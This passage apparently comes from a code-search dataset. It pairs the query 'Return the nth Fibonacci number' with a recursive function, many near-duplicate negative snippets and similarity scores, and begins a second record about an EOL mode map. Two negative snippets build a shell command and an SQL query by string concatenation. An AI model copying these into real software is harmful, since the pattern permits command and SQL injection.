geocode_result[0][\"geometry\"]\n ok_loc_types = [\"ROOFTOP\", \"GEOMETRIC_CENTER\"]\n if geometry[\"location_type\"] in ok_loc_types or \\\n geocode_result[0][\"types\"] == [\"postal_code\"]:\n return pd.Series({\"latitude\": geometry[\"location\"][\"lat\"],\n \"longitude\": geometry[\"location\"][\"lng\"],\n \"match_status\": 3})\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})", "def getEntry(self, zip_file):\n \n return self.getAllEntries().get(zip_file)", "def fix_location(r):\n \n # all is fine: just change zipcode 
datatype to str\n if not np.isnan(r['zip']) and not np.isnan(r['lat']):\n return [str(int(r['zip'])), r['lng'], r['lat']]\n \n # try to locate within zipcode polygons\n if not np.isnan(r['lat']):\n query = \"\"\"\n SELECT t.geoid as zip, {} as lng, {} as lat\n FROM us_zcta5 t JOIN usps_zcta5 z ON t.geoid = z.zip\n WHERE ST_Contains(t.shape, ST_GeomFromText('POINT({} {})', 2))\n \"\"\"\n res = pd.read_sql(query.format(r['lng'], r['lat'], r['lng'], r['lat']), con = con)\n if len(res) == 1:\n return res.values[0].tolist()\n\n # use zipcode center as location proxy: geocoding is prefered in this case, but might be quite expensive\n if not np.isnan(r['zip']):\n res = zipcodes[zipcodes['zip'] == str(int(r['zip']))]\n if len(res) == 1:\n return res.values[0].tolist()[:3]\n\n return [None, None, None]", "def searchCountry(host):\n process = subprocess.Popen(\"geoiplookup \"+host,stdout=subprocess.PIPE, shell=True)\n (output, err) = process.communicate()\n secondPart = output.split(\"GeoIP Country Edition: \", 1)[1]\n country = secondPart.split(\"\\nGeoIP City Edition\", 1)[0]\n return country", "def get_country_code(country_name):\n for code, name in COUNTRIES.items():\n if name == country_name:\n return code\n # if string isn't found returns None\n else:\n continue", "def country(name):\n return location_db().find(name=name)[\"country\"]", "def get_city(self, territory_id: str = \"\"):", "def get_city(self, territory_id: str = \"\"):" ]
[ "0.72173095", "0.669443", "0.66253436", "0.66198653", "0.64643675", "0.6446394", "0.6327299", "0.62487876", "0.6163434", "0.6108556", "0.6016015", "0.5976856", "0.59515876", "0.5928086", "0.57584274", "0.57179135", "0.5710414", "0.5634522", "0.56298053", "0.5622634", "0.55962557", "0.55466205", "0.55463", "0.5541144", "0.55284435", "0.5525873", "0.5525492", "0.54803157", "0.54749537", "0.5468904", "0.54457366", "0.54452455", "0.5412685", "0.5376579", "0.53727096", "0.53326607", "0.5331357", "0.53236043", "0.53039724", "0.5287272", "0.527973", "0.52766496", "0.52766496", "0.52766496", "0.5198934", "0.5194489", "0.51744586", "0.5156221", "0.51405466", "0.5140064", "0.51244974", "0.5099282", "0.509161", "0.5088811", "0.5087377", "0.50869673", "0.5080285", "0.50790596", "0.50707585", "0.50634885", "0.5042655", "0.5040994", "0.50223315", "0.5003732", "0.49967054", "0.4995582", "0.4994981", "0.49834424", "0.49768955", "0.49507967", "0.49494335", "0.49488053", "0.49443567", "0.4939537", "0.4939483", "0.4937237", "0.4936235", "0.49275413", "0.4925153", "0.49232978", "0.49161", "0.4914992", "0.49138454", "0.4909963", "0.48948297", "0.4891174", "0.48813117", "0.48795304", "0.48759368", "0.4875739", "0.4873573", "0.48651558", "0.48649505", "0.48640317", "0.48613998", "0.48588765", "0.48588225", "0.48549655", "0.48469034", "0.4844906", "0.4844906" ]
0.0
-1
Return the nth Fibonacci number
def fibonacci(n):
    if n in (0,1):
        return n
    return (fibonacci(n-2) + fibonacci(n-1))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fibonacci(n):", "def nthFibonacci(n):\n\n # Run some basic error checking\n try:\n n = int(n)\n except: # if this fails not a number inputed\n sys.stderr.write('Incorrect data input\\n')\n return None\n if n < 0:\n sys.stderr.write('Only positive integers allowed\\n')\n return None\n \n # since the error checking slows down the recursion we run it as a seperate function\n [Fnm,Fn] = fastrecursivefibonacci(n)\n return Fnm", "def fibonacci_iterative(nth_nmb: int) -> int:\n old, new = 0, 1\n if nth_nmb in (0, 1):\n return nth_nmb\n for __ in range(nth_nmb - 1):\n old, new = new, old + new\n return new", "def fibi(n):\n a, b = 0, 1\n for i in range(n):\n # fibonacci series is next no. is sum of previous two number.\n temp = a\n a = b\n # now nth fibonacci no. is sum of previous two number.\n b = temp+b\n # returning a because a changing each places\n return a", "def fibi(n):\n if n == 0: return 0\n if n == 1: return 1\n f_n2, f_n1 = 1, 1\n for i in range(3, n+1):\n f_n2, f_n1 = f_n1, f_n2+f_n1\n return f_n1", "def fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n nth = fibonacci(n-1) + fibonacci(n-2)\n return nth", "def fib(n:int) -> int:\n if n<= 2:\n return 1\n else:\n return fibonacci.fib(n-1) + fibonacci.fib(n-2)", "def fibi(n: int) -> int:\n if n == 0:\n return 0\n if n == 1:\n return 1\n f_n2, f_n1 = 1, 1\n for _ in range(3, n+1):\n f_n2, f_n1 = f_n1, f_n2+f_n1\n return f_n1", "def fib(n):\n n = int(n)\n if n <= 1:\n return 1\n\n return fib(n-1) + fib(n-2)", "def fast_fibonacci(n):\n return _fast_fibonacci(n)[0]", "def fib(n: int) -> int:\n if n == 0: return 0\n if n == 1: return 1\n return fib(n-1) + fib(n-2)", "def fib(n):\n print(\"fib({})\".format(n))\n if(n <= 2):\n return 1\n else:\n return fib(n-1) + fib(n-2)", "def fib(n):\n if n < 2:\n return n\n else:\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-1) + fibonacci(n-2)", "def fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n-1) + fibonacci(n-2)", "def fib (n):\r\n if n == 0 or n == 1:\r\n return 1\r\n else:\r\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n < 2:\n return n\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fib(n):\n if n == 0: return 0\n if n == 1: return 1\n return fib(n-1) + fib(n-2)", "def fib(n):\n if n in (0, 1): return n\n return fib(n-1) + fib(n-2)", "def fib(i):\n if i < 2: return 1\n return fib(i-1) + fib(i-2)", "def fib_iterative(n: int) -> int:\n print(n)\n return 0", "def fib(n: int) -> int:\n if n == 0:\n return 0\n if n == 1:\n return 1\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n < 0:\n raise ValueError(\"n cannot be negative\")\n elif n < 2:\n return n\n else:\n a, b = 0, 1\n for _ in range(n):\n a, b = b, add(a, b)\n return a", "def fib(n):\n if n == 1 or n == 2:\n result = 1\n else:\n result = fib(n-1) + fib(n-2)\n return result", "def fib(n): #Describe \"n\" as a variable in fib sequence\n while n == 0:\n return 0 #establish that 0 position is equal to 0\n if n == 1:\n return 1\n else:\n return fib(n-1) + fib(n-2)", "def fibonacci(n):\n if n in (0, 1):\n return n\n return fibonacci(n - 2) + fibonacci(n - 1)", "def fib(n):\n a, b = 1, 1\n while n:\n a, b = b, a + b\n n -= 1\n return a", "def fib(n):\n if n == 0 or n == 1:\n return n\n else:\n return fib(n-2) + fib(n-1)", "def fibonacci(n):\n if n <= 1:\n return n \n else:\n return fibonacci(n-1) + fibonacci(n-2)", "def fibonacci(n):\n print(n)\n if n == 0 or n == 1:\n return 1\n\n return fibonacci(n - 1) + fibonacci(n - 2)", "def 
fibonacci(n):\n fibval = sum_series(n, 0, 1)\n print(fibval)\n return fibval", "def fibonacci (n):\n\tif n == 0:\n\t\treturn 0\n\telif n == 1:\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(n-2) + fibonacci(n-1)", "def fib_iterative(n: int) -> int:\n if n < 0:\n raise ValueError\n number1 = 0\n number2 = 1\n counter = 1\n while counter < n:\n counter += 1\n number1, number2 = number2, number1 + number2\n return number2", "def fib(n): \n if n == 0:\n return 0\n elif n == 1:\n return 1\n\n else:\n return fib(n-1) + fib(n-2)", "def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n - 2) + fib(n - 1)", "def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n - 1) + fib(n - 2)", "def fibonacci(n):\n\tif n == 0:\n\t\treturn 0\n\telif n == 1:\n\t\treturn 1\n\telse:\n\t\treturn fibonacci(n-1) + fibonacci(n-2)", "def fibonacci_recursive(nth_nmb: int) -> int:\n def fib(_n):\n return _n if _n <= 1 else fib(_n - 1) + fib(_n - 2)\n return fib(nth_nmb)", "def fibonacci(n):\n if n in (0, 1):\n return n\n return (fibonacci(n-2) + fibonacci(n-1))", "def fibonacci(self, n):\n\n if n == 1:\n return 1\n elif n <= 0:\n return 0\n else:\n return self.fibonacci(n - 1) + self.fibonacci(n - 2)", "def fib(n):\n if n == 1:\n return 1\n else:\n return n + fib(n-1)", "def fibonacci(n):\n\tfib_seq = []\n\tnth_term = 0\n\t\n\tfor i in range(0,n+1):\n\t\tif i == 0:\n\t\t\tfib_seq.append(0)\n\t\tif i == 1:\n\t\t\tfib_seq.append(1)\n\t\tif i > 1:\n\t\t\tnth_term = fib_seq[-1] + fib_seq[-2]\n\t\t\tfib_seq.append(nth_term)\n\t\n\tprint(fib_seq)\n\tprint(fib_seq[n])\n\treturn(fib_seq[n])", "def fib3(n):\n if n < 2:\n return n\n return fib1(n-1) + fib1(n-2)", "def fib(n):\n if n==1 or n==2:\n return 1\n else:\n return fib(n-1)+fib(n-2)", "def fibonacci(n):\n\n if n <= 1:\n return n\n else:\n return (fibonacci(n-1) + fibonacci(n-2))", "def fibonacci(n):\n\n if (n == 0):\n return 0\n elif (n == 1):\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fibonacci_number(n):\r\n l = [0, 1] \r\n for i in range(n - 1):\r\n l = [*l, l[-1] + l[-2]]\r\n return l[n - 1]", "def fibonacci(n):\n if n == 1:\n return 0\n elif n == 2:\n return 1\n else:\n return fibonacci(n-2) + fibonacci(n-1)", "def fibonacci_term(n):\n return int(((1+sqrt(5))**n-(1-sqrt(5))**n)/(2**n*sqrt(5)))", "def fibonacci(n):\n\n if n == 0:\n return 0\n if n == 1:\n return 1\n \n previous = 0\n current = 1\n\n for i in range(n-1):\n previous, current = current, current + previous\n\n return current", "def find_fib(n):\n # fibo = 2.078087 * math.log(n) + 1.672276\n return 0 # fibo", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n return i", "def fibonacci(n):\r\n\r\n if n in past_fib:\r\n return past_fib[n]\r\n \r\n if n == 0 or n == 1:\r\n past_fib[n] = 1\r\n return 1\r\n\r\n total = fibonacci(n-1) + fibonacci(n-2)\r\n past_fib[n] = total\r\n return total", "def fibonacci(n):\n if n==0 :\n return 0\n elif n==1:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2)", "def fibo(n):\r\n if n==1:\r\n return 0\r\n elif n==2:\r\n return 1\r\n else:\r\n return fibo(n-1)+fibo(n-2)", "def fibonacci(n):\n sequence = [0, 1]\n for i in range(n + 1):\n value = add(sequence[-2], sequence[-1])\n sequence.append(value)\n return sequence[n]", "def fib(n):\n fib = [0, 1]\n if n > 2:\n for i in range(n):\n fib.append(fib[-1] + fib[-2])\n return 
fib[n-1]\n else:\n return fib[n-1]", "def optimized_fibonacci(f):\n a = 0\n b = 1\n if f < 2:\n return f\n else:\n for i in range(1, f):\n c = a + b\n a = b\n b = c\n return b", "def fibonacci(n):\n\n if n == 1:\n return 1\n elif n < 1:\n return 0\n else:\n return fibonacci(n-1) + fibonacci(n-2)", "def fib_formula(n):\n if n <= 1:\n return n\n else:\n return (fib_formula(n - 1) + fib_formula(n - 2))", "def fibonacci(n):\n assert n >= 0 and int(\n n) == n, 'n has to be greater than or equal to 0 and has to be an integer'\n if n in [0, 1]:\n return n\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)", "def fibonacciN(n):\n previous, current = 1, 1\n k = 2\n while k < n:\n previous, current = current, previous + current\n k += 1\n return current", "def fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return (fibonacci(n-1) + fibonacci(n-2))", "def fibonacci(n):\n\n ## Auxiliary functions for working in our polynomial ring.\n def poly_sqr((a, b)):\n a2 = a*a\n return 2*a*b + a2, a2 + b*b\n def poly_mul((a, b), (c, d)):\n ac = a*c\n return a*d + b*c + ac, ac + b*d\n\n ## Do the job. For negative indices, we take powers of t^{-1}.\n if n < 0: return power((1, -1), -n, (0, 1), poly_sqr, poly_mul)\n else: return power((1, 0), n, (0, 1), poly_sqr, poly_mul)", "def fibonacci0(n):\n assert n == int(n) and n > 0\n if n in [1, 2]:\n return 1\n return fibonacci0(n-1) + fibonacci0(n-2)", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return i", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return i", "def fib(n):\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return i", "def fibonacci_n(n):\n sqrt5 = math.sqrt(5)\n phi = (1 + sqrt5) / 2\n psi = (1 - sqrt5) / 2\n return (phi**n - psi**n) // sqrt5", "def fibonacci(n):\n\n if n == 1:\n v = 0\n elif n == 2:\n v = 1\n else:\n v = fibonacci(n - 2) + fibonacci(n - 1)\n\n return v", "def fibonacci0(n):\n assert n == int(n) and n > 0\n if n in [1, 2]:\n return 1\n return fibonacci0(n-1) + fibonacci0(n-2)", "def fibonacci(n: int) -> int:\n m = 1 << (n.bit_length() - 1)\n Fn = 0\n Fnm1 = 1\n while m:\n Fn2 = Fn * Fn\n Fn = 2 * Fnm1 * Fn + Fn2\n Fnm1 = Fnm1 * Fnm1 + Fn2\n if n & m:\n Fnm1, Fn = Fn, Fnm1 + Fn\n m >>= 1\n return Fn", "def next_fib(f):\n for f in fib:\n i = fib.index(f)\n return f+fib[i-1]", "def fibonacci():\n return sum_series(a=0, b=1)", "def fibonacci(n):\n k, m = 1, 1\n\n if n < 2:\n return n\n\n for i in range(2, n):\n k, m = m, k + m\n\n return m", "def fib(n):\n if n < 0:\n raise ValueError\n\n if n > 1:\n return fib(n - 1) + fib(n - 2)\n\n return n", "def fibonacci(n: int) -> int:\n if n <= 0:\n raise ValueError(\"The number must be greater than zero.\")\n exit(code=1)\n if n == 1:\n return 0\n elif n == 2:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n - 2)", "def fibonacci1(n):\n if n in (0, 1):\n return n\n return fibonacci1(n - 2) + fibonacci1(n - 1)", "def fibonacci_iter(n):\n f = []\n for x in range(n + 1):\n if x == 0:\n f.append(x)\n elif x == 1:\n f.append(x)\n else:\n f.append(f[-1] + f[-2])\n return f[-1]", "def fib1(n):\n if n < 2:\n return n\n return fib1(n-1) + fib1(n-2)", "def fibonacci(n, a = 0, b = 1):\n if n == 0:\n return a\n elif n == 1:\n return b\n else:\n return fibonacci(n - 1, b, a + b)", "def fib(n): # this line defines the function 'fib' where n is the input value\n i = 0\n j = 1\n n = n - 1\n\n while n >= 0:\n i, j = j, i + j\n n = n - 1\n \n return 
i", "def fib (n):\n a,b=0,1\n while b<n:\n\tprint b,\n\ta,b = b,a+b", "def fibonacci(n):\n if n <= 1:\n return 1\n n0 = 0\n n1 = 1\n result = 1\n level = 2\n while level <= n:\n result = n0 + n1\n n0 = n1\n n1 = result\n level += 1\n return result", "def fib(n):\n\ta,b=0,1\n\twhile b<n:\n\t\tprint b,\n\t\ta,b=b,a+b", "def fib(n):\n\ta, b = 0, 1\n\twhile a < n:\n\t\tprint a,\n\t\ta, b = b, a+b", "def fibnormal (n):\n\n if n < 3:\n return 1\n f1 = f2 = 1\n for i in range (n-1):\n f3 = f1 + f2\n f1, f2 = f2, f3\n\n return f3", "def get_fibonacci_last_digit_fast(n):\n fibonacci = [0 for i in range(n + 1)]\n fibonacci[1] = 1\n\n for i in range(2, n + 1):\n fibonacci[i] = (fibonacci[i - 1] + fibonacci[i - 2]) % 10\n\n return fibonacci[n]", "def fib(index):\n return round((GR**index)/R5)", "def fibonacci(num):\n if num == 0 or num ==1:\n return 1\n return fibonacci(num-1) + fibonacci (num-2)", "def fibo_element(n):\n f = ()\n if n < 0:\n print(\"Incorrect number\")\n elif n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibo_element(n-1) + fibo_element(n-2)", "def fib(n):\n global counter\n if n==0 or n==1:\n return 1\n else:\n if n-1==2 or n-2==2:\n counter+=1\n return fib(n-1) + fib(n-2)", "def fibclassic (n):\n\n return 1 if n < 3 else fibclassic (n-2) + fibclassic (n-1)", "def fibi2(n: int) -> int:\n f = [0, 1] + [None for _ in range(2, n+1)]\n for i in range(2, n+1):\n f[i] = f[i-1]+f[i-2]\n return f[n]", "def fibonacci(number: int) -> int:\n fibs = [0] * (number + 2)\n fibs[0] = 0\n fibs[1] = 1\n for i in range(2, number + 1):\n fibs[i] = fibs[i - 1] + fibs[i - 2]\n return fibs[number]", "def fib_recursive(n: int) -> int:\n print(n)\n return 0", "def fib(N):\n sqrt5 = math.sqrt(5)\n phi = (sqrt5 + 1) / 2\n return int(round(math.pow(phi, N) / sqrt5))", "def fib(n):\n a, b = 0, 1\n while b < n:\n print b,\n a, b = b, a+b", "def fib2(n):\n if n <= 2:\n return 1\n i, res = 1, 1\n for _ in range(n - 2):\n i, res = res, res + i\n return res" ]
[ "0.8549428", "0.83808696", "0.8357446", "0.8267962", "0.82505155", "0.8213346", "0.8213339", "0.8212905", "0.81149447", "0.8098057", "0.80716306", "0.8040074", "0.8032861", "0.8029916", "0.8029916", "0.8019259", "0.8019077", "0.8012156", "0.8007875", "0.8001539", "0.79852134", "0.798478", "0.7971879", "0.796173", "0.79607636", "0.7956564", "0.7947912", "0.79437095", "0.7939163", "0.793087", "0.7926684", "0.792416", "0.79177755", "0.7917123", "0.791375", "0.79056567", "0.79043746", "0.790302", "0.79014206", "0.7884692", "0.78817505", "0.7878559", "0.7878249", "0.7870866", "0.78684634", "0.7853879", "0.78508687", "0.7848421", "0.7848355", "0.78410333", "0.7835929", "0.78329885", "0.78276616", "0.781293", "0.78108233", "0.7807304", "0.7806639", "0.78050643", "0.7802335", "0.77912503", "0.7791148", "0.7784265", "0.77827543", "0.77812916", "0.7771224", "0.77694684", "0.7767021", "0.7767021", "0.7767021", "0.7756825", "0.77567786", "0.7749564", "0.7724282", "0.77222544", "0.77169573", "0.7709786", "0.7707383", "0.7706818", "0.76979643", "0.76971465", "0.7690063", "0.7678807", "0.7673536", "0.7662299", "0.7655996", "0.7653059", "0.76496464", "0.7639371", "0.7636822", "0.7633434", "0.76321936", "0.76279294", "0.76244855", "0.7597176", "0.7591671", "0.75871646", "0.75850254", "0.7578626", "0.7568075", "0.75604355" ]
0.78968835
39
Get the eol mode map
def EOLModeMap():
    # Maintenance Note: ints must be kept in sync with EDSTC_EOL_* in edstc
    return { EOL_MODE_CR   : _("Old Machintosh (\\r)"),
             EOL_MODE_LF   : _("Unix (\\n)"),
             EOL_MODE_CRLF : _("Windows (\\r\\n)")}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_eol_for_open(self) -> str:\n map = {\n EOLTypes.CRLF: WINDOWS_EOL,\n EOLTypes.LF: UNIX_EOL,\n EOLTypes.NATIVE: linesep,\n }\n\n return map[self]", "def get_modes(self):\n return [i for i, j in enumerate(self._modemap._map) if j is not None]", "def getModeLookupTable(self):\n mode_table = []\n header = None\n for line in open(PublicTransit.MODE_LOOKUP_FILE_NAME):\n line = line.strip()\n if len(line) == 0: \n continue\n line = map(str.strip,line.split(\",\"))\n if header is None:\n header = line\n #CPT_AGENCYID\tAGENCYNAME\tCPT_MODE\tSCH_ROUTEDESIGNATOR\tMODECODE\tMODEGROUP\n continue\n data = {}\n for i in range(len(line)):\n data[header[i]] = line[i]\n mode_table.append(data)\n return mode_table", "def _get_modes(self):\n return self.__modes", "def get_modes(self, code_block):\r\n # FUCK YOU INDEX ERRORS, LIST COMPS, AND EVEN YOU LAMBDAS I DON'T NEED PRETTY\r\n # 0 = pos mode\r\n # 1 = imm mode\r\n modes, mode_codes = [0, 0], list(reversed(str(code_block[0])))[2:]\r\n x = 0\r\n for mode in mode_codes:\r\n modes[x] = int(mode)\r\n x += 1\r\n print('Get modes: ')\r\n print(modes)\r\n return modes", "def get_modes(self):\n return self.circuit.get_modes()", "def modes(self, exp_id: int) -> List[str]:\n return list(self.state[exp_id].keys())", "def __mode_modesetid(self, mode):\n\t\tfor key,val in self.ms_all.iteritems():\n\t\t\tix = val.index(mode)\n\t\t\tif ix is not None:\n\t\t\t\treturn key, ix", "def all_modes(self):\n\n # Find \"post-proj all modes\"\n # Jump to first value, ignoring text.\n # Move through data, adding it to a list\n # continue onto next line.\n # Repeat until the following line is known to be empty.\n\n # output.dat is the psi4 output file.\n with open('output.dat', 'r') as file:\n lines = file.readlines()\n for count, line in enumerate(lines):\n if \"post-proj all modes\" in line:\n start_of_vals = count\n break\n else:\n raise EOFError('Cannot locate modes in output.dat file.')\n\n # Barring the first (and sometimes last) line, dat file has 6 values per row.\n end_of_vals = start_of_vals + (3 * len(self.molecule.molecule['input'])) // 6\n\n structures = lines[start_of_vals][24:].replace(\"'\", \"\").split()\n structures = structures[6:]\n\n for row in range(1, end_of_vals - start_of_vals):\n # Remove double strings and weird formatting.\n structures += lines[start_of_vals + row].replace(\"'\", \"\").replace(\"]\", \"\").split()\n\n all_modes = [float(val) for val in structures]\n\n return array(all_modes)", "def _get_applicable_modes(command):\n mode_dict = {}\n _add_applicable_modes(command, mode_dict)\n return mode_dict.keys()", "def parse_session_mode_and_map(log_data):\n try:\n match = search(\n r\"<\\d{2}:\\d{2}> [^d]* Loading level \\w+\\/(\\w+), \\w+ (\\w+)\",\n log_data)\n line_map, line_mode = match.groups()\n return (line_mode, line_map)\n except Exception:\n print(\"Something is wrong with the log file!\")", "def modes(self):\n return np.hstack(tuple(self.operator.modes))", "def all_modes(self):\n\n # Find \"post-proj all modes\"\n # Jump to first value, ignoring text.\n # Move through data, adding it to a list\n # continue onto next line.\n # Repeat until the following line is known to be empty.\n\n # output.dat is the psi4 output file.\n with open(\"output.dat\", \"r\") as file:\n lines = file.readlines()\n for count, line in enumerate(lines):\n if \"post-proj all modes\" in line:\n start_of_vals = count\n break\n else:\n raise EOFError(\"Cannot locate modes in output.dat file.\")\n\n # Barring the first (and sometimes last) line, dat file has 6 
values per row.\n end_of_vals = start_of_vals + (3 * len(self.molecule.atoms)) // 6\n\n structures = lines[start_of_vals][24:].replace(\"'\", \"\").split()\n structures = structures[6:]\n\n for row in range(1, end_of_vals - start_of_vals):\n # Remove double strings and weird formatting.\n structures += (\n lines[start_of_vals + row].replace(\"'\", \"\").replace(\"]\", \"\").split()\n )\n\n all_modes = [float(val) for val in structures]\n\n return np.array(all_modes)", "def __convertEOL(self):\n aw = self.activeWindow()\n aw.convertEols(aw.eolMode())", "def get_modes(self):\n modes = set()\n for er in self.exercise_recordings:\n if er.mode not in modes:\n modes.add(er.mode)\n return list(modes)", "def modes(self) -> List[str]:\n return [m.name for m in self._modes]", "def GetPackageModes(self):\n return self._modes", "def values(self):\n return self._modes.values()", "def get_focus_mode_names(self):\n names = []\n for focus_mode in self.focus_modes:\n names.append(focus_mode['modeName'])\n return names", "def _modes(self):\n answer = []\n for i in dir(self):\n if i.startswith('handle_'):\n answer.append(i.replace('handle_', ''))\n return answer", "def _get_mode(self):\n self._validate_mode()\n return deepcopy(self.mode)", "def common_mode(self):\n return self._common_mode", "def common_mode(self):\n return self._common_mode", "def getmode(self, mode):\r\n modes = {}\r\n # core modes\r\n for m, (basemode, basetype, bands) in _MODEINFO.items():\r\n modes[m] = ModeDescriptor(m, bands, basemode, basetype)\r\n # extra experimental modes\r\n modes[\"RGBa\"] = ModeDescriptor(\"RGBa\",\r\n (\"R\", \"G\", \"B\", \"a\"), \"RGB\", \"L\")\r\n modes[\"LA\"] = ModeDescriptor(\"LA\", (\"L\", \"A\"), \"L\", \"L\")\r\n modes[\"La\"] = ModeDescriptor(\"La\", (\"L\", \"a\"), \"L\", \"L\")\r\n modes[\"PA\"] = ModeDescriptor(\"PA\", (\"P\", \"A\"), \"RGB\", \"L\")\r\n # mapping modes\r\n modes[\"I;16\"] = ModeDescriptor(\"I;16\", \"I\", \"L\", \"L\")\r\n modes[\"I;16L\"] = ModeDescriptor(\"I;16L\", \"I\", \"L\", \"L\")\r\n modes[\"I;16B\"] = ModeDescriptor(\"I;16B\", \"I\", \"L\", \"L\")\r\n # set global mode cache atomically\r\n _modes = modes\r\n return _modes[mode]", "def line_styles (self):\n return self._line_styles", "def get_map(self):\n\n self.mp = defaultdict(lambda : ord('x'))\n y, x = 0, 0\n while True:\n cond, output = self.ic()\n\n if cond: break\n # New row of the print out\n if output == 10:\n y += 1\n x = 0\n # Assign the value to the map\n else:\n self.mp[y,x] = output\n x += 1\n \n return self.mp", "def get_keymap(self):\n return self.keymap", "def keys(self):\n return self._modes.keys()", "def _get_mode(self):\n raise NotImplementedError", "def get_all_color_modes(self):\n return self._all_color_modes", "def preset_modes(self):\n return self._preset_modes", "def get_mode(self) -> str:\n\n return self.send(self.cmd.GET_MODE)", "def map_rule4(self):\n odml.terminology.terminologies['map'] = parse(\"\"\"\n S1[T1]\n - P2\n S2[T2]\n - P1\n S3[T3]\n - P1\n - P2\n - P3\n \"\"\")", "def get_heatmode_stringlist(self):\n return text_heatmode", "def get_current_mode(self):\n return self.read(0xa2)", "def get_mode(self):\n summary = self.get_version_summary()\n pattern = '\\$.*? .*? (.*?) .*? .*? .*? .*? .*? .*? 
\\r\\n' \n mode = re.findall(pattern,summary).pop()\n return mode", "def get_keymap(lines: str):\n parsed = [line for line in lines.split(\"\\n\") if line]\n\n start = end = 0\n for i, line in enumerate(parsed):\n if \"qmkformat start\" in line:\n start = i + 1\n if \"qmkformat end\" in line:\n end = i\n break\n\n layout = \"\".join(parsed[start:end])\n return layout[layout.find(\"{\") + 1 : layout.find(\"}\")]", "def default_trace_codes() -> Mapping[int, str]:\n with open(Path(__file__).resolve().parent.joinpath('trace.codes'), 'r') as fd:\n return from_trace_codes_text(fd.read())", "def GetMapMode(*args, **kwargs):\n return _gdi_.DC_GetMapMode(*args, **kwargs)", "def raw_mode(self) -> ContextManager[None]:", "def modes(self):\n try:\n order = self._current_order\n except AttributeError:\n raise AttributeError('Cannot iterate over modes without iterating over orders!') from None\n mode = -order\n while mode <= order:\n yield mode\n mode += 1", "def config_mode(self):\n return \"\"", "def ActiveHlt2Lines(self) :\n return []", "def get_mode(self):\r\n return self._api.get_mode()", "def getDisplayModes(self, obj):\n modes = []\n return modes", "def getColorMapFlags():\n\treturn colorMap_flag", "def get_pers_modes(self, pcut):\n return self.get_allpers_modes()[pcut]", "def get_all_servers_modes():\n return _get_list(\n lambda server: server.mode,\n lambda server: server.mode_name_long\n )", "def getmode(self):\n return self.mode", "def cursor_mode(self):\n return self._cursor_mode", "def preset_modes(self) -> Optional[List[str]]:\n return [PRESET_MODE_WHOOSH]", "def find_mode_range(self):\n\n if (len(self.n) < 1): return -1,-1,-1,-1\n nmin = np.nanmin(self.modes['n'])\n nmax = np.nanmax(self.modes['n'])\n lmin = np.nanmin(self.modes['l'])\n lmax = np.nanmax(self.modes['l'])\n return nmin, nmax, lmin, lmax", "def mode(self):\n return self._lift(\"mode\")", "def get_lines(self) -> list[str]:\n\n chars = self.get_char(\"border\")\n assert isinstance(chars, list)\n left_border, _, right_border, _ = chars\n\n lines = super().get_lines()\n last_line = lines.pop()\n\n for line in range(256 // self.grid_cols):\n buff = left_border\n\n for num in range(self.grid_cols):\n col = str(line * self.grid_cols + num)\n if col == \"0\":\n buff += \" \"\n continue\n\n buff += self._layer_functions[self.layer](f\"{col:>3}\", col) + \" \"\n\n buff = buff[:-1]\n lines.append(buff + \"\" + right_border)\n\n lines.append(last_line)\n\n return lines", "def preset_modes(self) -> list:\n return self._preset_modes", "def get_mode(self):\r\n return self.mode", "def get_mode(state):\n node = state\n for key in (\"layers\", \"mode\"):\n node = node.get(key, {})\n return node.get(\"state\", \"add\")", "def getSchemaMap(self):\n\t\trSchemaMap = {}\n\t\tfor schemaName in self.schemaList:\n\t\t\tmodeList = [str(tKey) for tKey in self.schemaList[schemaName].modes.keys()]\n\n\t\t\tif len(modeList) == 1 and None in self.schemaList[schemaName].modes:\n\t\t\t\trSchemaMap[schemaName] = 0\n\t\t\telse:\n\t\t\t\trSchemaMap[schemaName] = modeList\n\n\t\treturn rSchemaMap", "def supported_modes(self):\n return [OFF, SYNC, CHARGE]", "def modesets(self):\n\t\tcopy_ms_all = {}\n\t\tfor mode_set_id,mode_set in self.ms_all.iteritems():\n\t\t\tcopy_ms_all[mode_set_id] = copy.deepcopy(mode_set.simple())\n\t\treturn copy_ms_all", "def get_macros(self):\n return LEVELS.keys()", "def _get_mode():\n return context.get_context('mode')", "def lines(self):\n if not PY2:\n return self.curbuf\n\n return [l.decode(self.options.get('encoding')) for l in 
